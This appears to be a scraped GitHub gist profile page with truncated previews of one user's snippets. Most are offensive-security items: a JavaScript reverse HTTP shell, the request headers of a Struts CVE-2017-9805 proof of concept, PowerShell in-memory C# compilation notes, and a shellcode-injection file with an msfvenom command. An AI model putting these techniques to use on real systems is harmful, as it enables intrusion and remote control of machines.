Skip to content

Instantly share code, notes, and snippets.

View Malayke's full-sized avatar


  • planet Earth (Solar System)
View GitHub Profile
Malayke /
Last active August 29, 2015 14:16
Crawl All Usernames And Passwords
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
# See documentation in:
import scrapy
Malayke /
Last active February 26, 2017 04:20
Colorful output M1(Mifare Classic) Card data from mfoc
#!/usr/bin/env python
# coding = utf-8
# Colorful print Mfoc data
# date: 2015-3-21 ,Nuruz
# changelog:
# 2017-2-26:
# change output color to similar with Mifare Classic Tools.
__author__ = 'Malayke'
Malayke / Preferences.sublime-settings
Created October 2, 2015 01:49
My ST3 configuration
"auto_complete_commit_on_tab": true,
"color_scheme": "Packages/Theme - Spacegray/base16-eighties.dark.tmTheme",
"enable_tab_scrolling": false,
"ensure_newline_at_eof_on_save": true,
Malayke / JSRat.ps1
Created March 11, 2016 04:47
Fileless JavaScript Reverse HTTP Shell
Author: Casey Smith @subTee
License: BSD3-Clause
Simple Reverse Shell over HTTP. Execute Commands on Client.
Most of the logic resides in establishes the beef object in the browser's DOM
window.onload then runs beef_init()
Within beef_init() we run
Within we gather response from beef.browser.getDetails()
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Malayke /
Last active December 13, 2017 10:49
Frida 获取加固后的 apk class 名
import frida, sys
def on_message(message, data):
if message['type'] == 'send':
print("[*] {0}".format(message['payload']))
jscode = """
Java.perform(function() {
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
Malayke /
Created September 9, 2018 05:02 — forked from milo2012/
Get Domains Belonging to Organization from
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
Malayke / NotCreateRemoteThread.c
Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =